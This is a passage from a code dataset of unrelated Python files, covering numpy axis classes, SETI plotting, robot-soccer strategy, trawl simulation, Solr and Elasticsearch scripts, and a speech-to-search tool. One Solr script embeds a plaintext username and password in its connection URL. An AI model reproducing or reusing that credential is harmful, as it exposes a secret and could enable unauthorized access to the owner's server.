axis_dim + 1\n # or alternatively -> check len of the axis -> number of temporal slices\n if len(self) != 1:\n # revert dimensionality reduction\n if isinstance(key[0], int):\n requires_new_axis = True\n else:\n requires_new_axis = True\n\n data = self.data[key]\n\n if requires_new_axis:\n data = data[np.newaxis]\n\n return self.__class__(\n data, name=self.name, label=self.label, unit=self.unit,\n )\n\n def __setitem__(\n self, key: Union[int, slice, Tuple[Union[int, slice]]], value: Any\n ) -> None:\n self.data[key] = value\n\n def __array__(self, dtype: Optional[np.dtype] = None) -> np.ndarray:\n data = self._data.astype(dtype) if dtype else self._data\n return np.squeeze(data, axis=0) if len(self) == 1 else data\n\n @property\n def data(self) -> np.ndarray:\n return np.asanyarray(self)\n\n @data.setter\n def data(self, value: Union[np.ndarray, Any]) -> None:\n new = np.broadcast_to(value, self.shape, subok=True)\n if len(self) == 1:\n self._data = np.array(new, subok=True)[np.newaxis]\n else:\n self._data = np.array(new, subok=True)\n\n @property\n def axis_dim(self):\n return self._data.ndim - 1\n\n @property\n def shape(self):\n return self._data.shape[1:] if len(self) == 1 else self._data.shape\n\n @property\n def dtype(self):\n return self._data.dtype\n\n @property\n def ndim(self):\n return (self._data.ndim - 1) if len(self) == 1 else self._data.ndim\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, value):\n parsed_value = make_identifiable(str(value))\n if not parsed_value:\n raise ValueError(\n \"Invalid name provided! Has to be able to be valid code\"\n )\n self._name = parsed_value\n\n @property\n def label(self):\n return self._label\n\n @label.setter\n def label(self, value):\n value = str(value)\n self._label = value\n\n @property\n def unit(self):\n return self._unit\n\n @unit.setter\n def unit(self, value):\n value = str(value)\n self._unit = value\n\n def equivalent(self, other: Union[Any, AxisType]) -> bool:\n if not isinstance(other, self.__class__):\n return False\n\n if self.axis_dim != other.axis_dim:\n return False\n\n if self.name != other.name:\n return False\n\n if self.label != other.label:\n return False\n\n if self.unit != other.unit:\n return False\n\n return True\n\n def append(self, other: \"Axis\") -> \"Axis\":\n if not isinstance(other, self.__class__):\n raise TypeError(f\"Can not append '{other}' to '{self}'\")\n\n if not self.equivalent(other):\n raise ValueError(\n f\"Mismatch in attributes between '{self}' and '{other}'\"\n )\n\n selfdata = (\n self.data[np.newaxis] if self.ndim == self.axis_dim else self.data\n )\n\n otherdata = (\n other.data[np.newaxis]\n if other.ndim == other.axis_dim\n else other.data\n )\n\n self._data = np.append(selfdata, otherdata, axis=0)\n\n\n_ignored_if_data = object()\n\n\nclass GridAxis(Axis):\n _supported_axis_types: Tuple[str, ...] = (\n \"lin\",\n \"linear\",\n \"log\",\n \"logarithmic\",\n \"custom\",\n )\n\n def __init__(\n self,\n data: np.ndarray,\n *,\n axis_type: str = \"linear\",\n name: str = \"unnamed\",\n label: str = \"\",\n unit: str = \"\",\n ) -> None:\n if axis_type not in self._supported_axis_types:\n raise ValueError(\n f\"'{axis_type}' is not supported for axis_type! 
\"\n + f\"It has to by one of {self._supported_axis_types}\"\n )\n\n super().__init__(data, name=name, label=label, unit=unit)\n self._axis_type = axis_type\n\n def __iter__(self) -> \"GridAxis\":\n for d in self._data:\n yield self.__class__(\n d[np.newaxis],\n name=self.name,\n label=self.label,\n unit=self.unit,\n axis_type=self.axis_type,\n )\n\n def __getitem__(\n self, key: Union[int, slice, Tuple[Union[int, slice]]]\n ) -> \"GridAxis\":\n if not is_basic_indexing(key):\n raise IndexError(\"Only basic indexing is supported!\")\n\n key = np.index_exp[key]\n requires_new_axis = False\n\n # first index corresponds to temporal slicing if ndim == axis_dim + 1\n # or alternatively -> check len of the axis -> number of temporal slices\n if len(self) != 1:\n # revert dimensionality reduction\n if isinstance(key[0], int):\n requires_new_axis = True\n else:\n requires_new_axis = True\n\n return self.__class__(\n self.data[key][np.newaxis] if requires_new_axis else self.data[key],\n name=self.name,\n label=self.label,\n unit=self.unit,\n axis_type=self.axis_type,\n )\n\n def __repr__(self) -> str:\n repr_ = f\"{self.__class__.__name__}(\"\n repr_ += f\"name='{self.name}', \"\n repr_ += f\"label='{self.label}', \"\n repr_ += f\"unit='{self.unit}', \"\n repr_ += f\"axis_type={self.axis_type}, \"\n repr_ += f\"axis_dim={self.axis_dim}, \"\n repr_ += f\"len={len(self)}\"\n repr_ += \")\"\n\n return repr_\n\n @property\n def axis_type(self) -> str:\n return self._axis_type\n\n @axis_type.setter\n def axis_type(self, value: str) -> None:\n value = str(value)\n if value not in self._supported_axis_types:\n raise ValueError(\n f\"'{value}' is not supported for axis_type! \"\n + f\"It has to by one of {self._supported_axis_types}\"\n )\n self._axis_type = value\n\n @classmethod\n def from_limits(\n cls,\n min_value: Union[np.ndarray, int, float],\n max_value: Union[np.ndarray, int, float],\n cells: int,\n *,\n axis_type: str = \"linear\",\n name: str = \"unnamed\",\n label: str = \"\",\n unit: str = \"\",\n ) -> \"GridAxis\":\n if axis_type in (\"lin\", \"linear\"):\n axis: np.ndarray = _lin_axis(min_value, max_value, cells)\n elif axis_type in (\"log\", \"logarithmic\"):\n axis: np.ndarray = _log_axis(min_value, max_value, cells)\n else:\n raise ValueError(\n \"Invalid axis type provided. 
\"\n + \"Only 'lin', 'linear', 'log', and 'logarithmic' \"\n + \"are supported!\"\n )\n\n if axis.ndim == 1:\n axis = axis[np.newaxis]\n\n axis = cls(axis, name=name, label=label, unit=unit)\n axis._axis_type = axis_type\n return axis\n\n def equivalent(self, other: Union[Any, GridAxisType]) -> bool:\n if not super().equivalent(other):\n return False\n\n if self.axis_type != other.axis_type:\n return False\n\n return True\n","sub_path":"nata/axes.py","file_name":"axes.py","file_ext":"py","file_size_in_byte":10254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"49248149","text":"import os\nimport pathlib\nimport re\n\nimport click\nimport pythonfinder\n\n\ndef find_by_version(val):\n finder = pythonfinder.Finder()\n return finder.find_python_version(val)\n\n\ndef find_in_system_path(val):\n choices = [val]\n if 'PATHEXT' in os.environ:\n choices += [\n f'{val}{ext}'\n for ext in os.environ['PATHEXT'].split(os.pathsep)\n ]\n for choice in choices:\n for path in os.environ['PATH'].split(os.pathsep):\n full_path = pathlib.Path(path, choice)\n if full_path.is_file():\n return full_path.resolve()\n return None\n\n\nclass PythonExecutablePath(click.Path):\n \"\"\"A path that also checks PATH for Python executables.\n \"\"\"\n def __init__(self, **kwargs):\n super().__init__(exists=True, dir_okay=False, file_okay=True, **kwargs)\n\n def convert(self, val, param, ctx):\n if re.match(r'^(\\d+)(?:\\.(\\d+))?$', val):\n # This looks like a Python version. Try to find it.\n entry = find_by_version(val)\n if entry and entry.path:\n val = str(entry.path.resolve())\n if 'PATH' in os.environ and os.path.sep not in val and '/' not in val:\n # This looks like a command. Try to resolve it before checking.\n path = find_in_system_path(val)\n if path:\n val = str(path.resolve())\n return super().convert(val, param, ctx)\n","sub_path":"src/pent/_click.py","file_name":"_click.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"627305914","text":"#!/usr/bin/env python3\n\nr\"\"\"\nFront-facing script to plot drifting, narrowband events in a set of generalized\ncadences of ON-OFF radio SETI observations.\n\"\"\"\n\nimport os\nfrom operator import attrgetter\nimport pandas\nfrom blimpy import Waterfall\nfrom . import plot_event\n\n\nclass PathRecord:\n r''' Definition of an H5 path record '''\n def __init__(self, path_h5, tstart, source_name):\n self.path_h5 = path_h5\n self.tstart = tstart\n self.source_name = source_name\n def __repr__(self):\n return repr((self.path_h5, self.tstart, self.source_name))\n\n\ndef plot_event_pipeline(event_csv_string, fils_list_string, user_validation=False,\n offset=0, filter_spec=None, sortby_tstart=True, plot_dir=None):\n r\"\"\"\n This function calls :func:`~turbo_seti.find_event.plot_event.plot_candidate_events` to\n plot the events in an output .csv file generated by find_event_pipeline.py\n\n Parameters\n ----------\n event_csv_string : str\n The string name of a .csv file that contains the\n list of events at a given filter level, created as\n output from find_event_pipeline.py. The\n .csv should have a filename containing information\n about its parameters, for example\n \"kepler1093b_0015_f2_snr10.csv\"\n Remember that the file was created with some cadence\n (ex. 
ABACAD) and ensure that the cadence matches the\n order of the files in fils_list_string\n\n fils_list_string : str\n The string name of a plaintext file ending in .lst\n that contains the filenames of .fil files, each on a\n new line, that corresponds to the cadence used to\n create the .csv file used for event_csv_string.\n\n user_validation : bool, optional\n A True/False flag that, when set to True, asks if the\n user wishes to continue with their input parameters\n (and requires a 'y' or 'n' typed as confirmation)\n before beginning to run the program. Recommended when\n first learning the program, not recommended for\n automated scripts.\n\n offset : int, optional\n The amount that the overdrawn \"best guess\" line from\n the event parameters in the csv should be shifted from\n its original position to enhance readability. Can be\n set to 0 (default; draws line on top of estimated\n event) or 'auto' (shifts line to the left by an auto-\n calculated amount, with addition lines showing original\n position).\n sortby_tstart : bool\n If True, the input file list is sorted by header.tstart.\n\n Examples\n --------\n >>> import plot_event_pipeline;\n ... plot_event_pipeline.plot_event_pipeline(event_csv_string, fils_list_string,\n ... user_validation=False, offset=0)\n\n \"\"\"\n #reading in the .csv containing the events\n try:\n candidate_event_dataframe = pandas.read_csv(event_csv_string, comment='#')\n print(\"plot_event_pipeline: Opened file {}\".format(event_csv_string))\n except:\n print(\"*** plot_event_pipeline: Oops, cannot access file {}\".format(event_csv_string))\n return\n\n fil_file_list = []\n for file in pandas.read_csv(fils_list_string, encoding='utf-8', header=None, chunksize=1):\n fil_file_list.append(file.iloc[0,0])\n\n #obtaining source names\n source_name_list = []\n path_record = []\n for fil in fil_file_list:\n wf = Waterfall(fil, load_data=False)\n source_name = wf.container.header[\"source_name\"]\n source_name_list.append(source_name)\n tstart = wf.container.header[\"tstart\"]\n path_record.append(PathRecord(fil, tstart, source_name))\n\n # If sorting by header.tstart, then rewrite the dat_file_list in header.tstart order.\n if sortby_tstart:\n path_record = sorted(path_record, key=attrgetter('tstart'))\n fil_file_list = []\n for obj in path_record:\n fil_file_list.append(obj.path_h5)\n print(\"plot_event_pipeline: file = {}, tstart = {}, source_name = {}\"\n .format(os.path.basename(obj.path_h5), obj.tstart, obj.source_name))\n else:\n for obj in path_record:\n print(\"plot_event_pipeline: file = {}, tstart = {}, source_name = {}\"\n .format(os.path.basename(obj.path_h5), obj.tstart, obj.source_name))\n\n #get rid of bytestring \"B'\"s if they're there (early versions of\n #seti_event.py added \"B'\"s to all of the source names)\n on_source_name_original = candidate_event_dataframe.Source[0]\n if on_source_name_original[0] == 'B' and on_source_name_original[-1] == '\\'':\n on_source_name = on_source_name_original[2:-2]\n else:\n on_source_name = on_source_name_original\n candidate_event_dataframe = candidate_event_dataframe.replace(to_replace=on_source_name_original,\n value=on_source_name)\n\n # Establish filter-level from filter_spec (preferred)\n # or 3rd token of the .csv path (don't break an existing caller)\n if filter_spec is None:\n filter_level = event_csv_string.split('_')[2]\n else:\n filter_level = filter_spec\n\n #begin user validation\n print(\"Plotting some events for: \", on_source_name)\n print(\"There are \" + 
str(len(candidate_event_dataframe.Source)) + \" total events in the csv file \" + event_csv_string)\n    print(\"Therefore, you are about to make \" + str(len(candidate_event_dataframe.Source)) + \" .png files.\")\n\n    if user_validation:\n        question = \"Do you wish to proceed with these settings?\"\n        while \"the answer is invalid\":\n            reply = str(input(question+' (y/n): ')).lower().strip()\n            if reply == '':\n                return\n            if reply[0] == 'y':\n                break\n            if reply[0] == 'n':\n                return\n\n    #move to plot_event.py for the actual plotting\n    plot_event.plot_candidate_events(candidate_event_dataframe,\n                                     fil_file_list,\n                                     filter_level,\n                                     source_name_list,\n                                     offset=offset,\n                                     plot_dir=plot_dir)\n","sub_path":"turbo_seti/find_event/plot_event_pipeline.py","file_name":"plot_event_pipeline.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"495073968","text":"'''\n    Solution to LeetCodeOJ Problem 3\n    Copyright (c) Anthony Chan. All rights reserved.\n\n    https://github.com/anthonyc1/LeetCodeOJ\n'''\n\nclass Solution:\n\tdef lengthOfLongestSubstring(self, s):\n\t\tstart = longest = 0\n\t\tseenChars = {}\n\n\t\tfor i in range(len(s)):\n\t\t\tif s[i] in seenChars and start <= seenChars[s[i]]:\n\t\t\t\tstart = seenChars[s[i]] + 1\n\t\t\telse:\n\t\t\t\tlongest = max(longest, i - start + 1)\n\t\t\tseenChars[s[i]] = i\n\t\treturn longest\n\n# sol = Solution()\n# print sol.lengthOfLongestSubstring(\"fjskjflakdjfslidfj\")","sub_path":"medium/python/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"329448027","text":"import math\nimport algorithms\nimport controller\nimport numpy as np\nfrom strategy.BaseStrategy import Strategy\nfrom strategy.DebugTools import DebugPotentialFieldStrategy\n \nclass Defender(Strategy):\n    def __init__(self, match, side, plot_field=False):\n        super().__init__(match, side+\"Defender\", controller=controller.TwoSidesLQR)\n        self.name = side+\"Defender\"\n    \n    def start(self, robot=None):\n        super().start(robot=robot)\n\n        self.sobra = algorithms.fields.PotentialField(self.match, name=\"SobraBehaviour\")\n\n        self.project = algorithms.fields.PotentialField(self.match, name=\"ProjectBehaviour\")\n\n        self.path = algorithms.fields.PotentialField(self.match, name=\"PathBehaviour\")\n        \n        self.kalm = algorithms.fields.PotentialField(self.match, name=\"KalmBehaviour\")\n        \n        self.right_redeploy = algorithms.fields.PotentialField(self.match, name=\"RightRedeployBehaviour\")\n        \n        self.left_redeploy = algorithms.fields.PotentialField(self.match, name=\"LeftRedeployBehaviour\") \n        \n        #small area x, y, width and height\n        self.sa_x, self.sa_y, self.sa_w, self.sa_h = self.match.game.field.get_small_area(\"defensive\")\n        \n        self.field_w, self.field_h = self.match.game.field.get_dimensions()\n\n        self.x = self.sa_w + 0.075\n        \n        #upper goal post\n        g_hgr = (self.field_h/2)+0.2-0.0375\n        sa_hgr = self.field_h/2 + self.sa_h/2\n        ga_hgr = self.field_h/2 + 0.4\n        \n        #lower goal post\n        g_lwr = (self.field_h/2)-0.2+0.0375\n        sa_lwr = self.field_h/2 - self.sa_h/2\n        ga_lwr = self.field_h/2 - 0.4\n\n        def side_verifier(y):\n            d = 0.05\n\n            if self.name == \"LeftDefender\":\n                y += d\n            elif self.name == \"RightDefender\":\n                y -= d\n            return y\n\n        def follow_ball(m):\n            if m.ball.y > g_hgr:\n                y = side_verifier(g_hgr)\n                return (self.x, y)\n            elif m.ball.y < g_lwr:\n                y = side_verifier(g_lwr)\n                return (self.x, 
y)\n            else:\n                y = side_verifier(m.ball.y)\n                return (self.x, y)\n\n        self.project.add_field(\n            algorithms.fields.LineField(\n                self.match,\n                target = follow_ball,\n                theta = 0,\n                line_size = self.field_h - self.sa_w,\n                line_dist = 0.1,\n                line_dist_max = 0.7,\n                multiplier = 0.7,\n                decay = lambda x : x\n            )\n        )\n        \n        def get_mid_value(a, b, c):\n            return max(min(a,b), min(max(a,b),c))\n\n        #returns the position where the field should be placed so that the ball is defended\n        def get_def_spot(m):\n            x = self.x\n            \n            if m.ball.vx == 0:\n                if m.ball.y > g_hgr:\n                    y = side_verifier(g_hgr)\n                    return (x, y)\n                elif m.ball.y < g_lwr:\n                    y = side_verifier(g_lwr)\n                    return (x, y)\n                else:\n                    y = side_verifier(m.ball.y)\n                    return (x, y)\n\n            if m.ball.y > ga_hgr:\n                y = side_verifier(g_hgr)\n                return (x, y)\n            elif m.ball.y < ga_lwr:\n                y = side_verifier(g_lwr)\n                return (x, y)\n            else:\n                if m.ball.x > 0.4:\n                    gk_y = self.match.robots[0].y\n\n                    if self.name == \"RightDefender\":\n                        gk_inf = gk_y-0.075/2\n                        m_inf = (gk_inf+g_lwr)/2\n                        y = ( (m.ball.y-m_inf)/m.ball.x)*x + m_inf\n                        y = get_mid_value(y, side_verifier(g_lwr), side_verifier(g_hgr))\n                        return (x, y)\n                    elif self.name == \"LeftDefender\":\n                        gk_sup = gk_y+0.075/2\n                        m_sup = (gk_sup+g_hgr)/2\n                        y = ( (m.ball.y-m_sup)/m.ball.x)*x + m_sup\n                        y = get_mid_value(y, side_verifier(g_lwr), side_verifier(g_hgr))\n                        return (x, y)\n\n                y = ( (m.ball.y-(self.field_h/2) )/m.ball.x)*x + self.field_h/2\n                y = get_mid_value(side_verifier(y), side_verifier(g_lwr), side_verifier(g_hgr))\n                return (x, y)\n\n        def sobra(m):\n            x = m.ball.x-0.8\n            if m.ball.x < self.robot.x and m.ball.vx > 0:\n                if m.ball.y > self.field_h/2:\n                    y = m.ball.y - 0.3\n                else:\n                    y = m.ball.y + 0.3\n            else:\n                if m.ball.y > self.field_h/2:\n                    y = self.field_h/2 + 0.55\n                else:\n                    y = self.field_h/2 - 0.55\n            \n            if self.field_h - y < 0.04:\n                y = self.field_h - 0.04\n            elif y < 0.04:\n                y = 0.04\n\n            return x,y\n        \n        self.path.add_field(\n            algorithms.fields.LineField(\n                self.match,\n                target = get_def_spot,\n                theta = 0,\n                line_size = self.field_h - self.sa_w,\n                line_dist = 0.1,\n                line_dist_max = self.field_h,\n                multiplier = 0.7,\n                decay = lambda x : x\n            )\n        )\n        \n        #stays at the center of the area\n        self.kalm.add_field(\n            algorithms.fields.LineField(\n                self.match,\n                target = lambda m: (self.x, side_verifier(self.field_h/2)),\n                theta = 0,\n                line_size = self.field_h - self.sa_w,\n                line_dist = 0.1,\n                line_dist_max = self.field_h/2,\n                decay = lambda x: x,\n                multiplier = 0.7,\n            )\n        )\n        \n        self.left_redeploy.add_field(\n            algorithms.fields.TangentialField(\n                self.match,\n                target = (self.sa_w+0.0375, self.sa_h+self.sa_y - 0.07),\n                radius = 0,\n                radius_max = self.field_w,\n                clockwise = False,\n                decay = lambda x: 1,\n                multiplier = 0.7\n            )\n        )\n\n        self.right_redeploy.add_field(\n            algorithms.fields.TangentialField(\n                self.match,\n                target = (self.sa_w+0.0375, self.sa_y + 0.07),\n                radius = 0,\n                radius_max = self.field_w,\n                clockwise = True,\n                decay = lambda x: 1,\n                multiplier = 0.7\n            )\n        )\n\n        self.sobra.add_field(\n            algorithms.fields.PointField(\n                self.match,\n                target = sobra,\n                radius = 0.1,\n                multiplier = 0.7,\n                decay = lambda x : x**6\n            )\n        )\n\n    \n    def decide(self):\n        \n        self.theta = self.robot.theta\n        self.maneuver = \"yep\"\n        behaviour = None\n        self.behaviour = None\n\n        if self.match.ball.x < self.field_w/2 + 0.2:\n            if (self.robot.x >= self.sa_w+0.01) and (self.robot.x < self.sa_w + 0.045):\n                \n                if self.match.ball.x > 0.225 and self.match.ball.x < self.field_w/2 + 0.3:\n                    behaviour = self.path\n                elif self.match.ball.x <= 0.225:\n                    behaviour = self.project\n            
else:\n behaviour = self.kalm\n \n else:\n if self.name == \"LeftDefender\":\n behaviour = self.left_redeploy\n else:\n behaviour = self.right_redeploy\n else:\n if self.name == \"LeftDefender\":\n self.maneuver = \"nope\"\n behaviour = self.sobra\n else:\n behaviour = self.kalm\n \n return behaviour.compute([self.robot.x, self.robot.y])\n\n def spin(self):\n if self.match.team_color.upper() == \"BLUE\":\n w = ((self.theta**2)**0.5 - 1.5708) * 20\n else:\n w = ((((self.theta**2)**0.5 - 4.71239)**2)**0.5) * 15\n return -w, w\n \n def spinning_time(self):\n if self.maneuver == \"yep\":\n if (self.robot.x > self.sa_w+0.01 and self.robot.x < self.sa_w + 0.04):\n if self.match.team_color.upper() == \"BLUE\":\n if ((self.theta >= -1.61 and self.theta <= -1.54) or (self.theta >= 1.54 and self.theta <= 1.61)):\n return False\n else:\n return True\n else:\n theta = self.theta*180/math.pi\n if ((theta >= 87 and theta <= 93) or (theta >= 267 and theta <= 273)):\n return False\n else:\n return True\n else:\n return False\n else:\n return False\n\n def update(self):\n if self.spinning_time():\n return self.spin()\n return self.controller.update()","sub_path":"strategy/tests/Defender.py","file_name":"Defender.py","file_ext":"py","file_size_in_byte":9177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"555960365","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 24 19:00:51 2022\n\n@author: dleon\n\"\"\"\nimport numpy as np\nfrom scipy.stats import cauchy\nfrom scipy.integrate import quad\nfrom ambit_stochastics.helpers.alternative_convolution_implementation import cumulative_and_diagonal_sums\n\n#def kernel(x_bar,t_bar):\n# return 1+ t_bar * 0.1\n \ndef kernel(t_bar):\n return np.sin(t_bar)\n \ndef x_integral(a,b):\n #return (b+b**1.5/1.5) - (a + a **1.5/1.5) \n return b-a\n \nif __name__ == '__main__':\n np.random.seed(3)\n tau = 0.5; k = 250 \n nr_trawls = k\n times = np.arange(tau, (nr_trawls+1) * tau, tau)\n max_nr_rows = k\n #trawl_function\n lambda_ = 1;\n trawl_function = lambda t : lambda_ * np.exp(t * lambda_) * (t<=0)\n #gaussian params L'~ N(mu,sigma**2)\n cauchy_scale = 0.1\n slice_matrix = np.zeros([min(nr_trawls,max_nr_rows-1),nr_trawls])\n \n\n \n for j in range(nr_trawls):\n if j %50 == 0:\n print(j)\n for i in range(min(nr_trawls,max_nr_rows-1)):\n\n if j==0: \n a = -np.inf\n else: \n a = j * tau\n b = (j+1) * tau \n \n if i+j+1 == nr_trawls:\n #gfun = 0\n #hfun = lambda t_bar : trawl_function(t_bar - k * tau)\n l_bound = 0\n h_bound = lambda t_bar: trawl_function(t_bar - k * tau)\n \n #func_to_integrate = lambda t_bar : x_integral(l_bound,h_bound(t_bar)) * (1+ np.sin(t_bar)) \n func_to_integrate = lambda t_bar : np.abs(x_integral(l_bound,h_bound(t_bar)) * kernel(t_bar)) \n\n \n \n \n else:\n #gfun = lambda t_bar : trawl_function(t_bar - (i+j+2)*tau)\n #hfun = lambda t_bar : trawl_function(t_bar - (i+j+1)*tau)\n l_bound = lambda t_bar: trawl_function(t_bar - (i+j+2)*tau)\n h_bound = lambda t_bar: trawl_function(t_bar - (i+j+1)*tau)\n func_to_integrate = lambda t_bar : np.abs(kernel(t_bar) * (x_integral(l_bound(t_bar),h_bound(t_bar))))\n \n int_f = quad(func_to_integrate,a,b,limit=200)[0]\n #int_f_squared = quad(lambda t_bar: (func_to_integrate(t_bar))**2,a,b)[0]\n \n #slice_matrix[i,j] = np.random.normal(int_f*mu,int_f_squared**0.5* sigma)\n slice_matrix[i,j] = cauchy.rvs(loc = 0, scale = cauchy_scale * int_f)\n #to double check this\n result = cumulative_and_diagonal_sums(slice_matrix)\n \n with open('cauchy_part.npy', 
'wb') as f:\n np.save(f, result)\n \n \n \n \n \n","sub_path":"other scripts/kernel_weighted_trawls/no_t_kernel/cauchy/t_bar_kernel_updated.py","file_name":"t_bar_kernel_updated.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"240425304","text":"import pysolr\nimport codecs\nimport sys\nimport os\nfrom frame import *\nfrom tqdm import tqdm\n\ncodecs.register_error(\"strict\", codecs.replace_errors)\n\n\nfolder_name = \"avg_per_cat_res\"\n\ntry:\n\tos.mkdir(folder_name)\nexcept:\n\tpass\n\n\nparam = {\"debugQuery\":\"off\",\n\"rows\" : 0\n}\n\nsolr = pysolr.Solr(\"http://cezaryrj:SolrisNice1995@localhost:8983/solr/\" + sys.argv[1])\n\n\n\n\n\na = open(\"avg_participation_res/res_ppl.txt\",\"r\").readlines()\n\ncat = dict()\n\ni = 0\ny = 1\n\nwhile i < 50:\n\tcat[i] = []\n\n\twhile a[y] != \"\\n\":\n\t\tcat[i].append(a[y].strip())\n\t\ty = y + 1\n\n\ti = i + 1\n\ty = y + 2\n\n\nres = []\n\nfor x in cat.keys():\n\tprint(x)\n\tres.append(x)\n\tfor y in tqdm(cat[x]):\n\n\t\ttry:\n\n\t\t\tfound = solr.search(\"From-address:\" + y,**param).raw_response[\"response\"][\"numFound\"]\n\n\t\t\tif found == 0:\n\n\t\t\t\tfound = solr.search(\"From-address:\" + fix_adr(y),**param).raw_response[\"response\"][\"numFound\"]\n\t\t\t\tres[x] = res[x] + found\n\n\t\t\telse:\n\n\t\t\t\tres[x] = res[x] + found\n\n\t\texcept:\n\n\t\t\tfound = solr.search(\"From-address:\" + fix_adr(y),**param).raw_response[\"response\"][\"numFound\"]\n\n\t\t\tif found == 0:\n\n\t\t\t\tfound = solr.search(\"From-address:\" + fix_adr(y),**param).raw_response[\"response\"][\"numFound\"]\n\t\t\t\tres[x] = res[x] + found\n\n\t\t\telse:\n\n\t\t\t\tres[x] = res[x] + found\n\n\n\n\tres[x] = res[x]/len(cat[x])\n\tprint(res[x])\ntmp = \"\"\n\ni = 0\nwhile i < len(res):\n\ttmp = tmp + (\"(\" + str(i) +\",\" + str(res[i]) + \")\")\n\ti = i + 1\n\n\nprint(tmp)\n","sub_path":"Raw repo/code/search/mw_query/avg_per_cat.py","file_name":"avg_per_cat.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"264277820","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 9 12:36:11 2021\n\n@author: GAYATHRI\n\"\"\"\nhungry=input(\"are you hungry\")\nif hungry==\"yes\":\n print(\"eat samosa\")\nelse:\n print(\"do your homework\")\n","sub_path":"hungry.py","file_name":"hungry.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"176558729","text":"import speech_recognition as sr\r\nimport webbrowser as wb\r\nimport pyttsx3\r\nengine=pyttsx3.init()\r\nengine.setProperty('voice','HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech\\Voices\\Tokens\\TTS_MS_EN-US_ZIRA_11.0')\r\nchrome_path='C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\r\nwhile(1):\r\n \r\n r=sr.Recognizer()\r\n with sr.Microphone() as source:\r\n r.adjust_for_ambient_noise(source)\r\n print('say something')\r\n audio=r.listen(source)\r\n print('done')\r\n\r\n try:\r\n text=r.recognize_google(audio)\r\n print('sexy thinks you said:\\n'+r.recognize_google(audio))\r\n lang='en'\r\n engine.say(text)\r\n engine.runAndWait()\r\n f_text=\"https://www.google.co.in/search?q=\"+text\r\n wb.get(chrome_path).open(f_text)\r\n except Exception as e:\r\n print(e)\r\n 
\r\n","sub_path":"speechrecognizer.py","file_name":"speechrecognizer.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"522843441","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 28 08:53:24 2018\r\n\r\n@author: JasonLeung\r\n\"\"\"\r\n\r\nimport urllib\r\nimport json\r\nimport pandas as pd\r\nhtml = urllib.request.urlopen('https://biendata.com/competition/kdd_2018_leaderboard_data/')\r\nhjson = json.loads(html.read())\r\nzdf = pd.DataFrame(hjson[1:])\r\ncolumns = hjson[0]['date'].copy()\r\ncolumns.append('team_name')\r\njsdf = zdf[columns]\r\njsdf.loc[:,hjson[0]['date']] = jsdf.loc[:,hjson[0]['date']].applymap(lambda x:round(float(x),5))\r\njsdf['zzdf'] = jsdf.apply( lambda x :x[hjson[0]['date']].sort_values().head(len(hjson[0]['date']) - 6).values.astype(float).mean(),axis=1)\r\njsdf['zzdfsum'] = jsdf.apply( lambda x :x[hjson[0]['date']].sort_values().head(len(hjson[0]['date']) - 6).values.astype(float).sum(),axis=1)\r\njsdf['zzdfmax'] = jsdf.apply( lambda x :x[hjson[0]['date']].sort_values().head(len(hjson[0]['date']) - 6).values.astype(float).max(),axis=1)\r\njsdf.sort_values('zzdf',inplace = True)\r\njsdf = jsdf.reset_index()\r\njsdf.index = range(jsdf.shape[0])","sub_path":"Evaluation_related_code/get_leaderboard.py","file_name":"get_leaderboard.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"275332561","text":"from elasticsearch import Elasticsearch\nimport json\nimport time\nimport logging\nimport socket\nfrom logging.handlers import SysLogHandler\n\nclass ContextFilter(logging.Filter):\n hostname = socket.gethostname()\n\n def filter(self, record):\n record.hostname = ContextFilter.hostname\n return True\n\nsyslog = SysLogHandler(address=('logs.papertrailapp.com', 38457))\nsyslog.addFilter(ContextFilter())\n\nformatter = logging.Formatter('%(asctime)s %(hostname)s LOG_BATCHER: %(message)s', datefmt='%b %d %H:%M:%S')\nsyslog.setFormatter(formatter)\n\nlogger = logging.getLogger()\nlogger.addHandler(syslog)\nlogger.setLevel(logging.INFO)\n\nes = Elasticsearch(['es'])\n\ndef tail(f):\n f.seek(0, 2)\n while True:\n line = f.readline()\n if not line:\n time.sleep(60)\n continue\n yield line\n\nlog = open('logs/visit_log.txt', 'r')\nfor visit in tail(log):\n try:\n logger.info({'user': int(visit.split(',')[0]), 'puzzle': int(visit.split(',')[1].rstrip())})\n es.update(index='puzzle_index', doc_type='puzzle', id=int(visit.split(',')[1].rstrip()) , body={'script': 'ctx._source.visits += 1'})\n except:\n logger.error({'user': visit.split(',')[0], 'puzzle': visit.split(',')[1]})\n","sub_path":"batch/log_batcher.py","file_name":"log_batcher.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243704221","text":"#!/usr/bin/env python\n\nimport csv\nimport json\nimport logging\nimport os\n\nfrom typing import Any, Dict, List\n\nfrom data.scrape.lib.codes import (\n LANGUAGES_PATH,\n PHONES_SUMMARY_PATH,\n PHONES_README_PATH,\n 